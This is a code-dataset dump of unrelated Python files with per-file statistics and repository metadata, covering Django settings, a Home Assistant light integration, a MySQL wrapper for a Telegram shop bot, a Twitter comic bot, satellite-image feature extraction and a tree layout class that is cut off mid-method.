if os.getenv('EMAIL_HOST'):
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = os.getenv('EMAIL_HOST')
EMAIL_PORT = os.getenv('EMAIL_PORT', 25)
EMAIL_HOST_USER = os.getenv('EMAIL_HOST_USER')
EMAIL_HOST_PASSWORD = os.getenv('EMAIL_HOST_PASSWORD')
EMAIL_USE_TLS = (os.getenv('EMAIL_USE_TLS', 'False').upper() == 'TRUE')
EMAIL_USE_SSL = (os.getenv('EMAIL_USE_SSL', 'False').upper() == 'TRUE')
DEFAULT_FROM_EMAIL = os.getenv('DEFAULT_FROM_EMAIL', 'noreply@example.com')
else:
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
if os.getenv('CACHE') == 'redis':
CACHES = {
"default": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": "redis://127.0.0.1:6379/1",
"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.DefaultClient",
}
}
}
else:
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
}
SETTINGS_EXPORT = []
LOG_LEVEL = os.getenv('LOG_LEVEL', 'INFO')
LOG_DIR = os.getenv('LOG_DIR')
if LOG_DIR:
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
},
'require_debug_true': {
'()': 'django.utils.log.RequireDebugTrue'
}
},
'formatters': {
'default': {
'format': '[%(asctime)s] %(levelname)s: %(message)s'
},
'name': {
'format': '[%(asctime)s] %(levelname)s %(name)s: %(message)s'
},
'console': {
'format': '[%(asctime)s] %(message)s'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
},
'error': {
'level': 'ERROR',
'class': 'logging.FileHandler',
'filename': os.path.join(LOG_DIR, 'error.log'),
'formatter': 'default'
},
'app': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'filename': os.path.join(LOG_DIR, 'app.log'),
'formatter': 'name'
},
'console': {
'level': 'INFO',
'filters': ['require_debug_true'],
'class': 'logging.StreamHandler',
'formatter': 'console'
}
},
'loggers': {
'django': {
'handlers': ['console'],
'level': LOG_LEVEL,
},
'django.request': {
'handlers': ['mail_admins', 'error_log'],
'level': 'ERROR',
'propagate': True
},
'app': {
'handlers': ['app'],
'level': LOG_LEVEL,
'propagate': False
}
}
}
| 28.376884 | 79 | 0.556933 | 533 | 5,647 | 5.703565 | 0.311445 | 0.044737 | 0.029934 | 0.022368 | 0.095724 | 0.067105 | 0.030921 | 0.030921 | 0.030921 | 0 | 0 | 0.007731 | 0.289888 | 5,647 | 198 | 80 | 28.520202 | 0.750374 | 0.004604 | 0 | 0.10119 | 0 | 0 | 0.422036 | 0.217515 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.005952 | 0.02381 | 0 | 0.02381 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
4731fabfe155fe4caec4fa4a58fe927e97e941d4 | 4,935 | py | Python | custom_components/magicstrip/light.py | elahd/ha-magicstrip | f33aeafc4a313d8674591e44c0d1d9c11c91e9cd | [
"MIT"
] | null | null | null | custom_components/magicstrip/light.py | elahd/ha-magicstrip | f33aeafc4a313d8674591e44c0d1d9c11c91e9cd | [
"MIT"
] | null | null | null | custom_components/magicstrip/light.py | elahd/ha-magicstrip | f33aeafc4a313d8674591e44c0d1d9c11c91e9cd | [
"MIT"
] | null | null | null | """MagicStrip light implementation."""
from __future__ import annotations
import logging
from typing import Any, MutableMapping
from homeassistant.components.light import (
ATTR_BRIGHTNESS,
ATTR_EFFECT,
ATTR_RGB_COLOR,
COLOR_MODE_RGB,
SUPPORT_BRIGHTNESS,
SUPPORT_COLOR,
SUPPORT_EFFECT,
LightEntity,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity import DeviceInfo, Entity
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.update_coordinator import (
CoordinatorEntity,
DataUpdateCoordinator,
UpdateFailed,
)
from pymagicstrip import MagicStripDevice, MagicStripState
from pymagicstrip.errors import BleConnectionError
from . import DeviceState, async_setup_entry_platform
from .const import DEFAULT_BRIGHTNESS, DEFAULT_COLOR, DEFAULT_EFFECT
_LOGGER = logging.getLogger(__name__)
async def async_setup_entry(
hass: HomeAssistant,
config_entry: ConfigEntry,
async_add_entities: AddEntitiesCallback,
) -> None:
"""Set up tuya sensors dynamically through tuya discovery."""
def _constructor(device_state: DeviceState) -> list[Entity]:
return [
MagicStripLight(
device_state.coordinator,
device_state.device,
device_state.light_device_info,
device_state.light_extra_state_attributes,
)
]
async_setup_entry_platform(hass, config_entry, async_add_entities, _constructor)
class MagicStripLight(CoordinatorEntity[MagicStripState], LightEntity):
"""MagicStrip light entity."""
def __init__(
self,
coordinator: DataUpdateCoordinator[MagicStripState],
device: MagicStripDevice,
device_info: DeviceInfo,
extra_state_attributes: MutableMapping[str, Any],
):
"""Create MagicStrip light."""
super().__init__(coordinator)
self._device = device
self._attr_supported_color_modes = [COLOR_MODE_RGB]
self._attr_supported_features = (
SUPPORT_EFFECT + SUPPORT_BRIGHTNESS + SUPPORT_COLOR
)
self._attr_color_mode = COLOR_MODE_RGB
self._attr_effect_list = self._device.state.effects_list + [DEFAULT_EFFECT]
self._attr_unique_id = device.address
self._attr_device_info = device_info
self._attr_extra_state_attributes = extra_state_attributes
self._attr_name = device_info["default_name"]
self._attr_icon: str = "mdi:led-strip-variant"
# This device doesn't return color and brighrness statuses. If we pass None to Home Assistant, it will display
# a light without brightness, color, or effect functions. To ensure that all functions are available, we substitute
# hard-coded values for None.
@property
def effect(self) -> str | None:
"""Return the current effect."""
if data := self.coordinator.data:
return DEFAULT_EFFECT if not data.effect else data.effect
return None
@property
def rgb_color(self) -> tuple[int, int, int] | None:
"""Return the rgb color value [int, int, int]."""
if data := self.coordinator.data:
return DEFAULT_COLOR if not data.color else data.color
return None
@property
def brightness(self) -> int | None:
"""Return the brightness of this light between 0..255."""
if data := self.coordinator.data:
return DEFAULT_BRIGHTNESS if not data.brightness else data.brightness
return None
@property
def is_on(self) -> bool | None:
"""Return True if entity is on."""
if data := self.coordinator.data:
return data.on
return None
async def async_turn_off(self, **kwargs) -> None:
"""Turn device off."""
if self.is_on:
await self._device.toggle_power()
self.coordinator.async_set_updated_data(self._device.state)
async def async_turn_on(self, **kwargs) -> None:
"""Turn device on."""
try:
if not self.is_on:
await self._device.toggle_power()
if ATTR_BRIGHTNESS in kwargs:
await self._device.set_brightness(int(kwargs[ATTR_BRIGHTNESS]))
if (
ATTR_RGB_COLOR in kwargs
and (rgb_color := kwargs[ATTR_RGB_COLOR]) != self.rgb_color
):
await self._device.set_color(rgb_color[0], rgb_color[1], rgb_color[2])
if ATTR_EFFECT in kwargs and (effect := kwargs[ATTR_EFFECT]) != self.effect:
effect = None if effect == DEFAULT_EFFECT else effect
await self._device.set_effect_name(effect)
except BleConnectionError as exc:
raise UpdateFailed from exc
self.coordinator.async_set_updated_data(self._device.state)
| 32.9 | 119 | 0.674772 | 562 | 4,935 | 5.661922 | 0.265125 | 0.025141 | 0.02357 | 0.026398 | 0.125393 | 0.097737 | 0.087995 | 0.052168 | 0.030798 | 0 | 0 | 0.001885 | 0.247416 | 4,935 | 149 | 120 | 33.120805 | 0.854873 | 0.09848 | 0 | 0.173077 | 0 | 0 | 0.007662 | 0.004876 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057692 | false | 0 | 0.125 | 0.009615 | 0.278846 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b26a2989cc751d061fee5e02533b62c0199aa67 | 1,407 | py | Python | matrix/spiralOrder.py | nishantml/100-days-of-code | fdbd7f8d195363467ab462bd4f0774a34379a769 | [
"MIT"
] | 1 | 2021-03-20T12:23:31.000Z | 2021-03-20T12:23:31.000Z | matrix/spiralOrder.py | nishantml/100-days-of-code | fdbd7f8d195363467ab462bd4f0774a34379a769 | [
"MIT"
] | null | null | null | matrix/spiralOrder.py | nishantml/100-days-of-code | fdbd7f8d195363467ab462bd4f0774a34379a769 | [
"MIT"
] | null | null | null | """
Given an m x n matrix, return all elements of the matrix in spiral order.
Example 1:
Input: matrix = [[1,2,3],[4,5,6],[7,8,9]]
Output: [1,2,3,6,9,8,7,4,5]
Example 2:
Input: matrix = [[1,2,3,4],[5,6,7,8],[9,10,11,12]]
Output: [1,2,3,4,8,12,11,10,9,5,6,7]
Constraints:
m == matrix.length
n == matrix[i].length
1 <= m, n <= 10
-100 <= matrix[i][j] <= 100
"""
from typing import List
class Solution:
def spiralOrder(self, matrix: List[List[int]]) -> List[int]:
direction = 0
left = 0;
right = len(matrix[0]) - 1
top = 0
bottom = len(matrix) - 1
# print(left,right,top,bottom)
res = []
while left <= right and top <= bottom:
if direction == 0:
for i in range(left, right + 1):
res.append(matrix[top][i])
top += 1
elif direction == 1:
for i in range(top, bottom + 1):
res.append(matrix[i][right])
right -= 1
elif direction == 2:
for i in range(right, left - 1, -1):
res.append(matrix[bottom][i])
bottom -= 1
elif direction == 3:
for i in range(bottom, top - 1, -1):
res.append(matrix[i][left])
left += 1
direction = (direction + 1) % 4
return res
| 22.693548 | 73 | 0.471215 | 202 | 1,407 | 3.282178 | 0.29703 | 0.012066 | 0.0181 | 0.066365 | 0.138763 | 0.060332 | 0.060332 | 0.060332 | 0.060332 | 0.060332 | 0 | 0.09215 | 0.375267 | 1,407 | 61 | 74 | 23.065574 | 0.662116 | 0.278607 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035714 | false | 0 | 0.035714 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b2c78d7a80a1e068c05e2fcdde3201711ae2bcd | 2,161 | py | Python | telegram_ecommerce/database/db_wrapper.py | Anonylions/telegram_ecommerce | f5382886bbebf607c735e2f451774c56df8d6011 | [
"MIT"
] | 10 | 2020-11-20T20:55:52.000Z | 2022-02-10T20:25:45.000Z | telegram_ecommerce/database/db_wrapper.py | Anonylions/telegram_ecommerce | f5382886bbebf607c735e2f451774c56df8d6011 | [
"MIT"
] | 1 | 2022-02-16T10:28:18.000Z | 2022-02-16T10:35:31.000Z | telegram_ecommerce/database/db_wrapper.py | Anonylions/telegram_ecommerce | f5382886bbebf607c735e2f451774c56df8d6011 | [
"MIT"
] | 8 | 2021-05-01T01:13:09.000Z | 2022-03-13T14:00:01.000Z |
import mysql.connector as connector
from ..utils.utils import get_sql_commands_from_a_file
from ..utils.consts import db_credentials
from ..utils.log import logger
class DBWrapper():
def __init__(self, db_credentials):
self.database_name = "telegram_ecommerce"
self.connection = connector.connect(**db_credentials)
self.connection.get_warnings = True
if not self.this_db_exist():
self.create_db()
self.use_this_db()
self.create_tables()
else:
self.use_this_db()
def create_db(self):
create_db_command = (
"CREATE DATABASE {database_name}"
.format(database_name=self.database_name))
self.execute_a_data_manipulation(create_db_command)
def create_tables(self):
create_tables_file = "telegram_ecommerce/database/create_tables.sql"
commands = get_sql_commands_from_a_file(create_tables_file)
cursor = self.connection.cursor()
for command in commands:
cursor.execute(command)
self.connection.commit()
cursor.close()
def use_this_db(self):
create_db_command = (
"USE {database_name}"
.format(database_name=self.database_name))
self.execute_a_data_manipulation(create_db_command)
def this_db_exist(self):
database_name_tuple = (self.database_name,)
databases_name_list = self.execute_a_query("SHOW DATABASES")
return database_name_tuple in databases_name_list
def execute_a_query(self, command, params=(), multi=False):
cursor = self.connection.cursor()
cursor.execute(command, params, multi)
rows = cursor.fetchall()
cursor.close()
return rows
def execute_a_data_manipulation(self, command, params=(), multi=False):
cursor = self.connection.cursor()
cursor.execute(command, params, multi)
self.connection.commit()
cursor.close()
def close(self):
self.connection.close()
db = DBWrapper(db_credentials)
logger.info("conected to database {}".format(db.database_name))
| 29.202703 | 76 | 0.661731 | 255 | 2,161 | 5.301961 | 0.239216 | 0.097633 | 0.059172 | 0.053254 | 0.39497 | 0.344675 | 0.260355 | 0.260355 | 0.260355 | 0.260355 | 0 | 0 | 0.245257 | 2,161 | 73 | 77 | 29.60274 | 0.828939 | 0 | 0 | 0.346154 | 0 | 0 | 0.069477 | 0.020843 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153846 | false | 0 | 0.076923 | 0 | 0.288462 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b2dd18e1ecfbb5e9df7c4c7ce61b73c2c764de6 | 5,334 | py | Python | satsense/extract.py | fossabot/satsense | 6666dd01a6988a86319c71a8f8802bf4b096c550 | [
"Apache-2.0"
] | 22 | 2018-03-14T10:29:38.000Z | 2022-03-29T10:54:51.000Z | satsense/extract.py | fdbesanto2/satsense | b0fa650193995a30328f26a36ebab2437c0e37ef | [
"Apache-2.0"
] | 49 | 2018-05-25T13:28:07.000Z | 2021-07-31T09:48:02.000Z | satsense/extract.py | fdbesanto2/satsense | b0fa650193995a30328f26a36ebab2437c0e37ef | [
"Apache-2.0"
] | 11 | 2018-04-24T08:55:28.000Z | 2021-02-17T22:32:05.000Z | """Module for computing features."""
import logging
from concurrent.futures import ProcessPoolExecutor
from functools import partial
from itertools import groupby
from os import cpu_count
from typing import Iterator
import numpy as np
from .features import Feature
from .generators import FullGenerator
from .image import FeatureVector
logger = logging.getLogger(__name__)
def extract_features(features: Iterator[Feature],
generator: FullGenerator,
n_jobs: int = -1):
"""Compute features.
Parameters
----------
features:
Iterable of features.
generator:
Generator providing the required windows on the image.
n_jobs:
The maximum number of processes to use. The default is to use the
value returned by :func:`os.cpu_count`.
Yields
------
:obj:`satsense.FeatureVector`
The requested feature vectors.
Examples
--------
Extracting features from an image::
import numpy as np
from satsense import Image
from satsense.generators import FullGenerator
from satsense.extract import extract_features
from satsense.features import NirNDVI, HistogramOfGradients, Pantex
# Define the features to calculate
features = [
HistogramOfGradients(((50, 50), (100, 100))),
NirNDVI(((50, 50),)),
Pantex(((50, 50), (100, 100))),
]
# Load the image into a generator
# This generator splits the image into chunks of 10x10 pixels
image = Image('test/data/source/section_2_sentinel.tif', 'quickbird')
image.precompute_normalization()
generator = FullGenerator(image, (10, 10))
# Calculate all the features and append them to a list
vector = []
for feature_vector in extract_features(features, generator):
# The shape returned is (x, y, w, v)
# where x is the number of chunks in the x direction
# y is the number of chunks in the y direction
# w is the number of windows the feature uses
# v is the length of the feature per window
# Reshape the resulting vector so it is (x, y, w * v)
# e.g. flattened along the windows and features
data = feature_vector.vector.reshape(
*feature_vector.vector.shape[0:2], -1)
vector.append(data)
# dstack reshapes the vector into and (x, y, n)
# where n is the total length of all features
featureset = np.dstack(vector)
"""
if n_jobs == 1:
yield from _extract_features(features, generator)
else:
yield from _extract_features_parallel(features, generator, n_jobs)
def _extract_features_parallel(features, generator, n_jobs=-1):
"""Extract features in parallel."""
if n_jobs < 1:
n_jobs = cpu_count()
logger.info("Extracting features using at most %s processes", n_jobs)
generator.image.precompute_normalization()
# Split generator in chunks
generators = tuple(generator.split(n_chunks=n_jobs))
with ProcessPoolExecutor(max_workers=n_jobs) as executor:
for feature in features:
extract = partial(extract_feature, feature)
vector = np.ma.vstack(tuple(executor.map(extract, generators)))
yield FeatureVector(feature, vector, generator.crs,
generator.transform)
def _extract_features(features, generator):
"""Compute features."""
generator.image.precompute_normalization()
for itype, group in groupby(features, lambda f: f.base_image):
group = list(group)
logger.info("Loading base image %s", itype)
window_shapes = {
shape
for feature in group for shape in feature.windows
}
generator.load_image(itype, window_shapes)
for feature in group:
vector = extract_feature(feature, generator)
yield FeatureVector(feature, vector, generator.crs,
generator.transform)
def extract_feature(feature, generator):
"""Compute a single feature vector.
Parameters
----------
feature : Feature
The feature to calculate
generator:
Generator providing the required windows on the image.
"""
logger.info("Computing feature %s with windows %s and arguments %s",
feature.__class__.__name__, feature.windows, feature.kwargs)
if not generator.loaded_itype == feature.base_image:
logger.info("Loading base image %s", feature.base_image)
generator.load_image(feature.base_image, feature.windows)
shape = generator.shape + (len(feature.windows), feature.size)
vector = np.ma.zeros((np.prod(shape[:-1]), feature.size), dtype=np.float32)
vector.mask = np.zeros_like(vector, dtype=bool)
size = vector.shape[0]
i = 0
for window in generator:
if window.shape[:2] not in feature.windows:
continue
if i % (size // 10 or 1) == 0:
logger.info("%s%% ready", 100 * i // size)
if window.mask.any():
vector.mask[i] = True
else:
vector[i] = feature(window)
i += 1
vector.shape = shape
return vector
| 34.412903 | 79 | 0.630484 | 633 | 5,334 | 5.21643 | 0.270142 | 0.015142 | 0.027862 | 0.029073 | 0.149606 | 0.134464 | 0.11811 | 0.076317 | 0.076317 | 0.043004 | 0 | 0.014088 | 0.281402 | 5,334 | 154 | 80 | 34.636364 | 0.847378 | 0.407387 | 0 | 0.119403 | 0 | 0 | 0.051908 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.059701 | false | 0 | 0.149254 | 0 | 0.223881 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b2e595b9f19bfb2e8967ee33be2a32475c6a58f | 2,319 | py | Python | main.py | lbellomo/mafalda_bot | a2037d266d3c7ba2129b65686d05c9611fd10c61 | [
"MIT"
] | 1 | 2021-02-20T16:33:37.000Z | 2021-02-20T16:33:37.000Z | main.py | lbellomo/mafalda_bot | a2037d266d3c7ba2129b65686d05c9611fd10c61 | [
"MIT"
] | null | null | null | main.py | lbellomo/mafalda_bot | a2037d266d3c7ba2129b65686d05c9611fd10c61 | [
"MIT"
] | null | null | null | import os
import sys
import time
from pathlib import Path
from random import choice
from codecs import decode
from base64 import b64decode
import tweepy
max_errors_count = 5
CONSUMER_KEY = os.environ["CONSUMER_KEY"]
CONSUMER_SECRET = os.environ["CONSUMER_SECRET"]
ACCESS_TOKEN = os.environ["ACCESS_TOKEN"]
ACCESS_TOKEN_SECRET = os.environ["ACCESS_TOKEN_SECRET"]
LANG = os.environ["LANG"]
if LANG == "es":
p_data = Path("crypt/")
file_sufix = ".png"
elif LANG == "pt":
p_data = Path("crypt_pt")
file_sufix = ".jpeg"
def remove_zero_from_start(s):
while s.startswith("0"):
s = s[1:]
return s
if __name__ == "__main__":
print("Starting ...")
valid_comics = list(p.name for p in p_data.iterdir())
comic = choice(valid_comics)
filename = comic + file_sufix
super_secret = (p_data / comic).read_text()
im_b = b64decode(decode(super_secret, "rot-13"))
p_im = Path(filename)
p_im.write_bytes(im_b)
if LANG == "es":
_, volumen, pagina, parte = comic.split("-")
if parte == "a":
parte = "1ra"
elif parte == "b":
parte = "2da"
status = f"Vol. {remove_zero_from_start(volumen)}, pag. {remove_zero_from_start(pagina)}, {parte} parte. #Mafalda #Quino"
elif LANG == "pt":
_, _, pagina, parte = comic.split("_")
if parte == "a":
parte = "um"
elif parte == "b":
parte = "dois"
elif parte == "c":
parte = "três"
elif parte == "d":
parte = "quatro"
status = f"Toda Mafalda, página {pagina}, parte {parte}. #Mafalda #Quino"
auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
auth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET)
api = tweepy.API(auth)
media = api.media_upload(filename)
errors_count = 0
while True:
try:
tweet = api.update_status(status=status, media_ids=[media.media_id])
except Exception as e:
print(f"Error found: {e}")
errors_count += 1
if errors_count == max_errors_count:
print("Max number of errors reached with twitter API!")
sys.exit(1)
time.sleep(errors_count + 1)
else:
break
print("Tweet done!")
| 24.670213 | 129 | 0.598103 | 298 | 2,319 | 4.426175 | 0.389262 | 0.058378 | 0.038666 | 0.050038 | 0.136467 | 0.051554 | 0.051554 | 0.051554 | 0 | 0 | 0 | 0.010143 | 0.277275 | 2,319 | 93 | 130 | 24.935484 | 0.77685 | 0 | 0 | 0.115942 | 0 | 0.014493 | 0.16947 | 0.028892 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014493 | false | 0 | 0.115942 | 0 | 0.144928 | 0.057971 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b2f1506a9908854c576dc2669ef2013acbe7667 | 1,787 | py | Python | steelpy/f2uModel/load/sqlite/main.py | svortega/steelpy | bef35eb8ab8728fc29f57b7070b5f3bac0b0e840 | [
"MIT"
] | 4 | 2021-09-28T12:52:01.000Z | 2022-02-24T22:30:22.000Z | steelpy/f2uModel/load/sqlite/main.py | svortega/steelpy | bef35eb8ab8728fc29f57b7070b5f3bac0b0e840 | [
"MIT"
] | null | null | null | steelpy/f2uModel/load/sqlite/main.py | svortega/steelpy | bef35eb8ab8728fc29f57b7070b5f3bac0b0e840 | [
"MIT"
] | null | null | null | #
# Copyright (c) 2009-2021 fem2ufo
#
# Python stdlib imports
#from typing import NamedTuple, Dict, List, Iterable, Union
# package imports
from steelpy.f2uModel.load.sqlite.basic_load import BasicLoadSQL
from steelpy.f2uModel.load.sqlite.combination import LoadCombSQL
from steelpy.f2uModel.results.sqlite.operation.process_sql import create_connection, create_table
#
#
#
class LoadingSQL:
__slots__ = ['_basic', '_combination', 'db_file']
def __init__(self, db_file: str,
db_system:str="sqlite"):
"""
"""
self.db_file = db_file
self._basic = BasicLoadSQL(db_file)
self._combination = LoadCombSQL(db_file)
# create node table
self._create_table()
@property
def basic(self):
"""
"""
return self._basic
#
@property
def combination(self):
"""
"""
return self._combination
#
def _create_table(self):
""" """
table_load = "CREATE TABLE IF NOT EXISTS tb_Load(\
number INTEGER PRIMARY KEY NOT NULL,\
name INTEGER NOT NULL,\
title TEXT NOT NULL,\
type TEXT NOT NULL);"
table_comb_load = "CREATE TABLE IF NOT EXISTS tb_LoadCombIndex(\
number INTEGER PRIMARY KEY NOT NULL,\
load_number INTEGER NOT NULL REFERENCES tb_Load(number),\
bl_number INTEGER REFERENCES tb_Load(number),\
lc_number INTEGER REFERENCES tb_Load(number),\
factor DECIMAL NOT NULL);"
conn = create_connection(self.db_file)
create_table(conn, table_load)
create_table(conn, table_comb_load)
#
# | 29.783333 | 97 | 0.588137 | 191 | 1,787 | 5.256545 | 0.34555 | 0.076693 | 0.047809 | 0.065737 | 0.243028 | 0.185259 | 0.055777 | 0 | 0 | 0 | 0 | 0.009983 | 0.327364 | 1,787 | 60 | 98 | 29.783333 | 0.825291 | 0.081142 | 0 | 0.125 | 0 | 0 | 0.019683 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.09375 | 0 | 0.34375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b2f83d5cd93c073ad130cc113bab25a1d03255b | 423 | py | Python | wrap/pybind11/pybind11/__init__.py | xxiao-1/gtsam | 8b1516f43ffdf6b5098fc282b566f2ee1edb50f6 | [
"BSD-3-Clause"
] | 84 | 2020-09-07T01:38:44.000Z | 2022-03-31T16:05:11.000Z | wrap/pybind11/pybind11/__init__.py | xxiao-1/gtsam | 8b1516f43ffdf6b5098fc282b566f2ee1edb50f6 | [
"BSD-3-Clause"
] | 39 | 2016-11-25T22:14:09.000Z | 2022-01-13T21:44:51.000Z | wrap/pybind11/pybind11/__init__.py | xxiao-1/gtsam | 8b1516f43ffdf6b5098fc282b566f2ee1edb50f6 | [
"BSD-3-Clause"
] | 22 | 2018-07-12T06:16:57.000Z | 2022-01-15T03:38:51.000Z | # -*- coding: utf-8 -*-
from ._version import version_info, __version__ # noqa: F401 imported but unused
def get_include(user=False):
import os
d = os.path.dirname(__file__)
if os.path.exists(os.path.join(d, "include")):
# Package is installed
return os.path.join(d, "include")
else:
# Package is from a source directory
return os.path.join(os.path.dirname(d), "include")
| 30.214286 | 81 | 0.64539 | 60 | 423 | 4.366667 | 0.55 | 0.137405 | 0.114504 | 0.083969 | 0.137405 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012195 | 0.224586 | 423 | 13 | 82 | 32.538462 | 0.786585 | 0.255319 | 0 | 0 | 0 | 0 | 0.067742 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.25 | 0 | 0.625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b30d2a47cc806b49df80d10546f31a2ce91bf14 | 20,347 | py | Python | h3/tree.py | rajatkapoor/pyh3 | 874b6aa94d61cd13b2d8e9232b1cc5971fc193f3 | [
"MIT"
] | 61 | 2015-08-11T00:44:58.000Z | 2022-02-10T12:14:01.000Z | h3/tree.py | rajatkapoor/pyh3 | 874b6aa94d61cd13b2d8e9232b1cc5971fc193f3 | [
"MIT"
] | 3 | 2016-02-26T17:27:19.000Z | 2016-08-12T03:04:12.000Z | h3/tree.py | rajatkapoor/pyh3 | 874b6aa94d61cd13b2d8e9232b1cc5971fc193f3 | [
"MIT"
] | 17 | 2015-08-10T20:32:55.000Z | 2019-03-13T19:33:21.000Z | import logging
import math
from collections import deque
from node import Node
from operator import itemgetter
from h3math import compute_radius, compute_hyperbolic_area, compute_delta_phi, compute_delta_theta
import mpl_toolkits.mplot3d.art3d as art3d
from matplotlib.patches import Circle
import matplotlib.pyplot as plt
from matplotlib.font_manager import FontProperties
"""
Customized exception for invalid edge input.
"""
class InvalidArgument(Exception):
pass
"""
The tree structure storing all nodes and edges, and also provide easy node lookup.
"""
class Tree(object):
"""
The Tree class is the entry point for this application. It's only argument is an iterable edgelist. This can be a
generator, list, tuple, etc. Each edge should be of the format (parent_id, child_id). They should be int types
(long is fine) and they should be consecutive. The edgelist must form a single connected Tree. If that is not
the case you'll need to prune your graph to make this the case. A common operation for displaying otherwise
cyclic graphs is to simply plot the minimum spanning tree.
:param edges: a tuple for a tree edge as (parent, child). This is required.
:type edges: iterable(tuple(int, int))
"""
def __init__(self, edges=None):
self.nodes = {}
self.height = 0
self.root = None
for parent_id, child_id in edges:
self.insert_edge(child_id, parent_id)
edges = None # Release that memory.
for id, node in self.nodes.iteritems():
if node.parent is None:
self.root = node
break
self.__label_node_generations()
self.set_subtree_radius()
self.set_subtree_size()
self.sort_children_by_radius()
self.set_placement()
def insert_edge(self, parent_id, child_id):
"""
Insert edge(parent, child) pair into the tree. No assumptions are made about the structure except that a Node
can have exactly 1 parent, and each child can only occur once. Otherwise; cyclic graphs can be input. This will
probably cause your layout to run forever.
:param int parent_id: The id of the parent node.
:param int child_id: The id of the child node.
:returns: A tuple of the parent and child nodes as Node objects.
"""
parent = self.nodes.get(parent_id, Node(parent_id))
child = self.nodes.get(child_id, Node(child_id))
child.parent = parent
parent.children.add(child)
self.nodes[parent_id] = parent
self.nodes[child_id] = child
return parent, child
def get_leaf_nodes(self):
"""
Gets the node ids for all leaf nodes in the Tree.
:returns: A generator of all the leaf nodes in the Tree
"""
for node_id, node in self.nodes.iteritems():
if not node.children:
yield node.node_id
def print_tree(self):
"""
Print the tree sorted by depth to log, including the following parameters.
The tree is traversed in a breath-first-search.
"""
current_generation = deque([self.root.node_id])
next_generation = True
while next_generation:
next_generation = deque()
while current_generation:
node_id = current_generation.popleft()
logging.info(
"{0}, parent: {1}, depth: {2}, #children: {3}, size: {4}, radius: {5}, area: {6}"
.format(node_id,
self.nodes[node_id].parent,
self.nodes[node_id].depth,
len(self.nodes[node_id].children),
self.nodes[node_id].tree_size,
self.nodes[node_id].radius,
self.nodes[node_id].area))
for child in self.nodes[node_id].children:
next_generation.append(child.node_id)
current_generation = next_generation
def __label_node_generations(self, depth=0):
"""
Decorate each node with it's depth in the tree.
:param int depth: the initial depth value for the root, default 0
"""
current_generation = deque([self.root.node_id])
next_generation = True
while next_generation:
next_generation = deque()
while current_generation:
